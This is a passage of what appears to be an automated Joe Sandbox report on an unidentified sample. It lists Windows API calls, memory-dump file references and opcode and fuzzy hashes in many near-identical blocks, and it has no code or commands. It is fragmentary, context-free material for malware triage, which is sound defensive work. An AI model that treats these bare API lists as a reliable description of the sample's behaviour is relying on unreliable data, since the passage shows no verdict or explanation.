                                                                                                                        • Instruction Fuzzy Hash: 6211A0B6805610CFD7117F64AC413D87A90EF82331F550264E4636F1E2CBB49900D6B1
                                                                                                                        APIs
                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00D9352A
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                        • _wcscat.LIBCMT ref: 00E066C0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FullNamePath_memmove_wcscat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 257928180-0
                                                                                                                        • Opcode ID: 0d66d0bfd4f19f144e8ac81aa7fde3a684684f70b6d5a7a6dbb6967b22b2707c
                                                                                                                        • Instruction ID: 463c14a1c9a565bcb0d7e371f9fa35ac88e2c75a40638968e23fc31c0e9da796
                                                                                                                        • Opcode Fuzzy Hash: 0d66d0bfd4f19f144e8ac81aa7fde3a684684f70b6d5a7a6dbb6967b22b2707c
                                                                                                                        • Instruction Fuzzy Hash: 6501847194410DABCF40FBA4D846ADD73F9EF18348F0145A5B926E7190EA309B858BB1
                                                                                                                        APIs
                                                                                                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 00DE9534
                                                                                                                        • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00DE9557
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastsend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1802528911-0
                                                                                                                        • Opcode ID: 64b3fec8d8e5e32e63d7d822a5d51a4c5c940f0a893e706c4f943ca7aebe5cc2
                                                                                                                        • Instruction ID: 5ddce0d9316dc1d68893b940cd0ef2182e51cbdf6c1bee77fb9695559b1baa81
                                                                                                                        • Opcode Fuzzy Hash: 64b3fec8d8e5e32e63d7d822a5d51a4c5c940f0a893e706c4f943ca7aebe5cc2
                                                                                                                        • Instruction Fuzzy Hash: 11017C35204200AFCB10EF29C891B6AB7E9EB89724F11852AF65A87391CB70EC05CB70
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E
                                                                                                                        • __lock_file.LIBCMT ref: 00DB42B9
                                                                                                                          • Part of subcall function 00DB5A9F: __lock.LIBCMT ref: 00DB5AC2
                                                                                                                        • __fclose_nolock.LIBCMT ref: 00DB42C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2800547568-0
                                                                                                                        • Opcode ID: db92cf195b4b14345f550b22b9a2d55cf03876e21ea98cee25ed18e30525653c
                                                                                                                        • Instruction ID: d16f88d1886c7028edccd1c8d6b6e4d5239ea6c136f5761cc9c7bbdd3f8c8b5a
                                                                                                                        • Opcode Fuzzy Hash: db92cf195b4b14345f550b22b9a2d55cf03876e21ea98cee25ed18e30525653c
                                                                                                                        • Instruction Fuzzy Hash: 4CF09031801714EBDB10EB7588027DE6BD0EF81334F258209B867AB1C2CB7C9901AB79
                                                                                                                        APIs
                                                                                                                        • timeGetTime.WINMM ref: 00DAF57A
                                                                                                                          • Part of subcall function 00D9E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D9E279
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00E075D3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePeekSleepTimetime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1792118007-0
                                                                                                                        • Opcode ID: 3d5263e72467e5d479ae4d57acf53633124a90c618bb0c48ed77b1833dcb6df4
                                                                                                                        • Instruction ID: 3304a9ff55b864ad9f689942087eca068d14abd4e3fd3597326956c14a98f5f5
                                                                                                                        • Opcode Fuzzy Hash: 3d5263e72467e5d479ae4d57acf53633124a90c618bb0c48ed77b1833dcb6df4
                                                                                                                        • Instruction Fuzzy Hash: A7F08C712446149FD314EF69D805B96BBE8EF48320F00442AF85AE7291DB70A800CBF0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
                                                                                                                          • Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00D983C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __itow__swprintf__wcsnicmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 712828618-0
                                                                                                                        • Opcode ID: e260f32b362f40a490229fbc4edb8b40ed79d01c0f08b473291f62ec8f55089f
                                                                                                                        • Instruction ID: ee20b55828103f919125327eaf97ca612aed8892e862348be9ccc9c884e2c581
                                                                                                                        • Opcode Fuzzy Hash: e260f32b362f40a490229fbc4edb8b40ed79d01c0f08b473291f62ec8f55089f
                                                                                                                        • Instruction Fuzzy Hash: A1F18C71508302AFCB04DF58C88186FBBE5FF9A704F54891DF98697261EB30E945DBA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                        • Instruction ID: cbe596a86a28e5549c41a825292977c04a5bdd2f28ef99f4a0df0ffe57327708
                                                                                                                        • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                                                                                                                        • Instruction Fuzzy Hash: D661B0B0A042069FCB04DF58C880A7AF7E5FF5A314F148669E956C7281E7B0EC95CBB1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 457f367bb789475499251a65116b92089774c8124e54c15ba381055526ec3b2a
                                                                                                                        • Instruction ID: 7dd5e6e6d2c710c1fa02ce148438a0bfe411ea96009bdc874c59496db5bd2c71
                                                                                                                        • Opcode Fuzzy Hash: 457f367bb789475499251a65116b92089774c8124e54c15ba381055526ec3b2a
                                                                                                                        • Instruction Fuzzy Hash: 68519535700214AFCF14EFA8C991EAD77A6EF89314B1481A9F546AB392DB30ED41D770
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                        • Instruction ID: ebb94063e0c4d92983ec7862b35771cb0f56dcb5d022ee5ab0bc22926ccc4974
                                                                                                                        • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                        • Instruction Fuzzy Hash: 4D41DF79200702CFCB24DF59E580A62F7E0FF88360715C66EE89A8B761D730E851CB60
                                                                                                                        APIs
                                                                                                                        • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00D94F8F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        • Opcode ID: 1acb80455425ac55aaae9abb3f0dfea20a5f035359b0478e6b769f3b62da728d
                                                                                                                        • Instruction ID: a3b8e8faa09811ff4bfe03f59014acf36035e1166a2a03a0b88ca4f65692f853
                                                                                                                        • Opcode Fuzzy Hash: 1acb80455425ac55aaae9abb3f0dfea20a5f035359b0478e6b769f3b62da728d
                                                                                                                        • Instruction Fuzzy Hash: 32315971A00616AFCF08CF6CC480AADB7B5FF88314F188629E81993751D770F9A1CBA0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: select
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1274211008-0
                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                        • Instruction ID: 92d058641ebbb61dd99147b96147cc53d4f1f952256923701697adf6b29be8c6
                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                        • Instruction Fuzzy Hash: 5C31B571A00106ABD718DF98D480A6EFBB5FB4A310B2886E5E489CB255D731EDC1CFE0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        • Opcode ID: 90a7af18731cdb108e847fe927e9a35eb4e1852cf2f96f877539e32a769b4bb0
                                                                                                                        • Instruction ID: 84ce4106f497bc4fc48206ec784743d4cb376cccb1d74a9cbe71d6934108ac2c
                                                                                                                        • Opcode Fuzzy Hash: 90a7af18731cdb108e847fe927e9a35eb4e1852cf2f96f877539e32a769b4bb0
                                                                                                                        • Instruction Fuzzy Hash: 90414E74504751CFEB24CF18C444B1ABBE1BF89348F1985ACE9965B362C372E885CF62
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: eec6568c36c7c1f27129388b407aa3a0be13dbc1b97fab6eb9bebea6acdb2561
                                                                                                                        • Instruction ID: 365cb6d6ed8726b26e710bef8bb68233030c2025dc82f9b7a078557a897e57ba
                                                                                                                        • Opcode Fuzzy Hash: eec6568c36c7c1f27129388b407aa3a0be13dbc1b97fab6eb9bebea6acdb2561
                                                                                                                        • Instruction Fuzzy Hash: 872105F0A00604EBCF149F56E944AA97FF8FB56340F25886EE586E5090EB3095D1C725
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                        • Instruction ID: cd2a2b73cabeb24a949247a519632d2d6b68fbcf32cc92f5cf4eb7661fc727ba
                                                                                                                        • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                        • Instruction Fuzzy Hash: E9115E76600601DFCB24DF28D481956BBF9FF49350720C86EE88ECB662E732E841CB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D93F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00D93F90
                                                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00D934E2,?,00000001), ref: 00D93FCD
                                                                                                                          • Part of subcall function 00D93E78: FreeLibrary.KERNEL32(00000000), ref: 00D93EAB
                                                                                                                          • Part of subcall function 00D94010: _memmove.LIBCMT ref: 00D9405A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$Load_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3640140200-0
                                                                                                                        • Opcode ID: 7843ee29d7bd111a7fbb182fbf5725c6c484fb458f7ac9fb24992c4d0438dad1
                                                                                                                        • Instruction ID: de6ad9add96a8f9c082281bf0a7ea51f6bd7f64d26822add1bef769eeadd14eb
                                                                                                                        • Opcode Fuzzy Hash: 7843ee29d7bd111a7fbb182fbf5725c6c484fb458f7ac9fb24992c4d0438dad1
                                                                                                                        • Instruction Fuzzy Hash: 8411CE32610309AACF14AF64DC06FAE77A9DF50704F108829F982E71C2DB709E45DB70
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        • Opcode ID: 24fb0da6b002ae04b3e43363c75dc1ceaf6fb09905d0e7b2c3dd4011c628ae04
                                                                                                                        • Instruction ID: d0071c55c77fea7214d938cd9a433c28f17a1cea00b2e02278b3d4b156e3c0bc
                                                                                                                        • Opcode Fuzzy Hash: 24fb0da6b002ae04b3e43363c75dc1ceaf6fb09905d0e7b2c3dd4011c628ae04
                                                                                                                        • Instruction Fuzzy Hash: 9E212570508701CFEB24DF28C844A1BBBE1BF8A344F194968E99657262C731E885CF62
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
